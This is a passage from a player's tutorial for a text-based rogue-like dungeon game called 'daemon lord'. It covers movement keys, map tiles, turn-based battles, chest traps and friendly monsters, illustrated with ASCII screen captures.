^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^...^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^.@.^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^...^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n # name class ac hp status ^ ^\n 1 ab G-FIG 4 13 OK ^ ^\n 2 ben G-FIG 4 12 OK ^ ^\n 3 cam G-FIG 4 10 OK ^ ^\n 4 dia N-THI 10 7 OK ^ ^\n 5 emily G-PRI 10 13 OK ^ ^\n 6 faun G-MAG 10 7 OK ^ ^\n\nCongratulations!\nYou (`@`) are now in the dungeon and on the upstairs to the outside world.\n`^` indicates areas that you have not visited yet. `.` is a floor tile that you can walk on. \n\n\n<a id=\"org56d6bb2\"></a>\n\n### Walk around the Dungeon\n\nThe dungeon is a little dark and only 3x3 tiles around you are visible. Let's move around a little with `h, j, k, l` keys. The key bindings should be familiar to those who use vi/vim and have played rogue-like games.\n\nThe party (`@`) is always shown in the center of the map scroll window.\n\nHere's the key operations on dungeon maps\n\n<table border=\"2\" cellspacing=\"0\" cellpadding=\"6\" rules=\"groups\" frame=\"hsides\">\n\n\n<colgroup>\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n</colgroup>\n<thead>\n<tr>\n<th scope=\"col\" class=\"org-left\">key</th>\n<th scope=\"col\" class=\"org-left\">action</th>\n</tr>\n</thead>\n\n<tbody>\n<tr>\n<td class=\"org-left\">h</td>\n<td class=\"org-left\">move left (west)</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">j</td>\n<td class=\"org-left\">move up (north)</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">k</td>\n<td class=\"org-left\">move down (south)</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">l</td>\n<td class=\"org-left\">move right (east)</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">c</td>\n<td class=\"org-left\">camp menu</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">o + direction</td>\n<td class=\"org-left\">(unlock and) open door</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">.</td>\n<td class=\"org-left\">stay/stomp?</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">S</td>\n<td class=\"org-left\">save</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">Q</td>\n<td class=\"org-left\">Quit game w/o saving</td>\n</tr>\n</tbody>\n</table>\n\n daemon lord - dl - [maze] floor:?? (???/???) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###+###^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#....@#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#..<..#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###+###^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nYou can now see inside a 5x4 room. `<` is upstairs. `#` is a stone wall or a rock. `+` is a door. Let's move next to a door and type `o` for open > and direction, in this case, `k` - north.\n\nHere's map tile table for your convenience.\n\n<table border=\"2\" cellspacing=\"0\" cellpadding=\"6\" rules=\"groups\" frame=\"hsides\">\n\n\n<colgroup>\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n</colgroup>\n<thead>\n<tr>\n<th scope=\"col\" class=\"org-left\">tile</th>\n<th scope=\"col\" class=\"org-left\">description</th>\n</tr>\n</thead>\n\n<tbody>\n<tr>\n<td class=\"org-left\">`.`</td>\n<td class=\"org-left\">floor tile you can walk on</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">`^`</td>\n<td class=\"org-left\">unknown area (not visited yet)</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">`#`</td>\n<td class=\"org-left\">stone wall/rock</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">`<`</td>\n<td class=\"org-left\">upstairs</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">`>`</td>\n<td class=\"org-left\">downstaris</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">`+`</td>\n<td class=\"org-left\">door (need to open)</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">`*`</td>\n<td class=\"org-left\">locked door</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">`%`</td>\n<td class=\"org-left\">locked door (need special key)</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">`,`</td>\n<td class=\"org-left\">message or event</td>\n</tr>\n</tbody>\n</table>\n\nFor locked doors (`*`), you can try to unlock until succeed. Your party needs a thief or a ninja for that. A low level theif might find difficult to unlock a locked door.\n\nFor special locked doors (`%`), you first need to find the key. Hint: The key should be somewhere on the same floor. Look for an event tile (`,`).\n\nNote that there's no elevator/lift in the dungeon. Use \"tsubasa\" spell instead.\n\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###.###^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#..@..#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#..<..#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###+###^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n # name class ac hp status ^* north ^\n 1 ab G-FIG 4 13 OK ^* north ^\n 2 ben G-FIG 4 12 OK ^* north ^\n 3 cam G-FIG 4 10 OK ^* west ^\n 4 dia N-THI 10 7 OK ^* west ^\n 5 emily G-PRI 10 13 OK ^ Which direction? - ;)leave > k ^\n 6 faun G-MAG 10 7 OK ^* Opened. ^\n\nOops, another door. Let's open again.\n\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#+#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###@###^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#..<..#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###+###^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n\n<a id=\"org9440384\"></a>\n\n### Battle\n\nContinue to walk around &#x2026; and, !? See `*** encounter ***` in the message window at the bottom right?\n\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#####+#####^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#....@....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###.#######^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###.###^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#..<..#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n # name class ac hp status ^* east ^\n 1 ab G-FIG 4 13 OK ^* east ^\n 2 ben G-FIG 4 12 OK ^* north ^\n 3 cam G-FIG 4 10 OK ^* west ^\n 4 dia N-THI 10 7 OK ^* west ^\n 5 emily G-PRI 10 13 OK ^* west ^\n 6 faun G-MAG 10 7 OK ^* *** encounter *** ^\n\nYou encountered a group of blue slimes! Two new windows will open for a battle. The upper one is the monster list window. The lower one is the battle message window.\n\n daemon lord - dl - [battle] floor:?? (???/???) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^| 1) 3 blue slimes (3) |^^^^^^^^^^^^^\n ^^^^^^^^^| |^^^^^^^^^^^^^\n ^^^^^^^^^| |^^^^^^^^^^^^^\n ^^^^^^^^^| |^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^| * You encountered slimes. |^^^^^^^^^^^^^\n ^^^^^^^^^| * Options - f)ight s)pell |^^^^^^^^^^^^^\n ^^^^^^^^^| u)se p)arry r)un t)ake back |^^^^^^^^^^^^^\n ^^^^^^^^^| ab's action? > k |^^^^^^^^^^^^^\n ^^^^^^^^^| ab's action? > f |^^^^^^^^^^^^^\n ^^^^^^^^^| ben's action? > f |^^^^^^^^^^^^^\n ^^^^^^^^^| cam's action? > f |^^^^^^^^^^^^^\n ^^^^^^^^^| dia's action? > f |^^^^^^^^^^^^^\n ^^^^^^^^^| emily's action? > f |^^^^^^^^^^^^^\n ^^^^^^^^^| faun's action? > s |^^^^^^^^^^^^^\n ^^^^^^^^^| * What spell to cast? |^^^^^^^^^^^^^\n ^^^^^^^^^| > shunmin |^^^^^^^^^^^^^\n ^^^^^^^^^| * Press any key or t)ake back > |^^^^^^^^^^^^^\n\nFive members will fight and Faun the mage will cast \"shunmin\" (spring sleep) spell, which forces a group of enemies into asleep.\n\n daemon lord - dl - [battle] floor:?? (???/???) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^| 1) 2 blue slimes (1) |^^^^^^^^^^^^^\n ^^^^^^^^^| |^^^^^^^^^^^^^\n ^^^^^^^^^| |^^^^^^^^^^^^^\n ^^^^^^^^^| |^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^| * Press any key or t)ake back > |^^^^^^^^^^^^^\n ^^^^^^^^^| * dia swings violently at blue slime and hits 1 |^^^^^^^^^^^^^\n ^^^^^^^^^| times for 2 damage. |^^^^^^^^^^^^^\n ^^^^^^^^^| * faun casted shunmin. |^^^^^^^^^^^^^\n ^^^^^^^^^| blue slime is not slept. |^^^^^^^^^^^^^\n ^^^^^^^^^| blue slime is not slept. |^^^^^^^^^^^^^\n ^^^^^^^^^| blue slime is slept. |^^^^^^^^^^^^^\n ^^^^^^^^^| * cam thrusts violently at blue slime and hits 1 |^^^^^^^^^^^^^\n ^^^^^^^^^| times for 1 damage. |^^^^^^^^^^^^^\n ^^^^^^^^^| blue slime is killed. |^^^^^^^^^^^^^\n\nEverybody is fighting. Umm, \"shunmin\" put only one out of three slimes to sleep. shunmin is more effective against animal or human type monsters.\n\nCam killed one of them. Notice `1) 2 blue slimes (1)` ? Because 1 out of 2 is asleep.\n\n ^^^^^^^^^| times for 1 damage. |^^^^^^^^^^^^^\n ^^^^^^^^^| blue slime is killed. |^^^^^^^^^^^^^\n ^^^^^^^^^| * ben slashes violently at blue slime and hits 1 |^^^^^^^^^^^^^\n ^^^^^^^^^| times for 6 damage. |^^^^^^^^^^^^^\n ^^^^^^^^^| blue slime is killed. |^^^^^^^^^^^^^\n ^^^^^^^^^| * emily swings violently at blue slime and hits 1 |^^^^^^^^^^^^^\n ^^^^^^^^^| times for 2 damage. |^^^^^^^^^^^^^\n ^^^^^^^^^| * ab slashes violently at blue slime and hits 1 |^^^^^^^^^^^^^\n ^^^^^^^^^| times for 6 damage. |^^^^^^^^^^^^^\n ^^^^^^^^^| blue slime is killed. |^^^^^^^^^^^^^\n\nThe party killed all three slimes.\n\n daemon lord - dl - [maze] floor:?? (???/???) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#####+#####^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#......@..#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###.#######^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###.###^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#..<..#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###+###^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n # name class ac hp status ^* south ^\n 1 ab G-FIG 4 13 OK ^* east ^\n 2 ben G-FIG 4 12 OK ^* east ^\n 3 cam G-FIG 4 10 OK ^* east ^\n 4 dia N-THI 10 7 OK ^* *** encounter *** ^\n 5 emily G-PRI 10 13 OK ^ Each survivor gets 27 e.p. ^\n 6 faun G-MAG 10 7 OK ^ Each survivor gets 9 gold. ^\n\nYeah! Each survivor received 27 experience points and 9 gold from this battle.\n\n\n<a id=\"orgc02a53d\"></a>\n\n### Chest\n\nSometimes, you encounter a monster party on entering a room. They are room guardians.\n\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^####.^^^^...^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^....#^^^^.@.^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^....######.#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^..<........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^....########^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^##+##^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n # name class ac hp status ^* north ^\n 1 ab G-FIG 4 13 OK ^* *** encounter *** ^\n 2 ben G-FIG 4 12 OK ^ ^\n\nAnd after you defeated room guardians, you may find a chest.\n\n daemon lord - dl - [maze] floor:?? (???/???) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| * A chest! |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| * o)pen k)antei i)nspect d)isarm |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| l)eave alone |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| Option? > |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| |^^^^^^^^^^^^^^^^^^^^^^\n\nChests are usually protected with traps. You need first to identify the trap and then disarm it before opening a chest. And this is when a thief is quite usuful.\n\nYou have a few options.\n\n- `o)pen` without disarming the trap.\n- `k)antei` use \"kantei\" spell to identify the trap\n- `i)nspect` the trap. It might activate the trap\n- `d)isarm` the trap. You need to type the trap name\n- `l)eave alone` Give up the chest and walk away\n\nIf your party has a thief, `i)dentify` and `d)isarm` the trap is sufficient. If the floor is 1 or 2 deep, you can just walk away from chests as you won't find good stuff in them on shallow floors.\n\n ^^^^^^^^^^^^^^| * A chest! |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| * o)pen k)antei i)nspect d)isarm |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| l)eave alone |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| Option? > i |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| Who? - # or l)eave > 4 |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| It is poison needle. |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| * o)pen k)antei i)nspect d)isarm |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| l)eave alone |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| Option? > |^^^^^^^^^^^^^^^^^^^^^^\n\nDia the theif identified the trap as \"poison needle\". To disarm it, you need to type the trap name accurately.\n\n ^^^^^^^^^^^^^^| * o)pen k)antei i)nspect d)isarm |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| l)eave alone |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| Option? > d |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| Who? - # or l)eave > 4 |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| * Trap name? |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| > poison needle |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| Disarmed the trap. |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| * There was no interesting item. |^^^^^^^^^^^^^^^^^^^^^^\n\nHe disarmed the poison needle trap and opened the chest. Unfortunately, there was nothing interesting in it this time.\n\nHere's the trap list.\n\n<table border=\"2\" cellspacing=\"0\" cellpadding=\"6\" rules=\"groups\" frame=\"hsides\">\n\n\n<colgroup>\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n</colgroup>\n<thead>\n<tr>\n<th scope=\"col\" class=\"org-left\">trap</th>\n<th scope=\"col\" class=\"org-left\">effect</th>\n</tr>\n</thead>\n\n<tbody>\n<tr>\n<td class=\"org-left\">poison needle</td>\n<td class=\"org-left\">poision the member who tried to identify/disarm</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">crossbow bolt</td>\n<td class=\"org-left\">inflict damages to a random member</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">stunner</td>\n<td class=\"org-left\">paralyze the member who tried to identify/disarm</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">exploding box</td>\n<td class=\"org-left\">inflict damages to entire party members</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">gas bomb</td>\n<td class=\"org-left\">poison entire party members</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">mage blaster</td>\n<td class=\"org-left\">paralyze members who use mage spells</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">priest blaster</td>\n<td class=\"org-left\">paralyze members who use priest spells</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">teleporter</td>\n<td class=\"org-left\">teleport party to random location (could be in rock)</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">alarm</td>\n<td class=\"org-left\">summon nearby monsters</td>\n</tr>\n</tbody>\n</table>\n\n\n<a id=\"orgb3c2450\"></a>\n\n### Friendly monsters\n\nSometimes, you encounter a friendly monster party. You can choose either leave (`y`) or fight anyway (`n`). In DL, random alignment reversal is not implemented so you can freely walk away or fight without any penalties.\n\n ^^^^^^^^^| 1) 5 orcs (5) |^^^^^^^^^^^^^\n 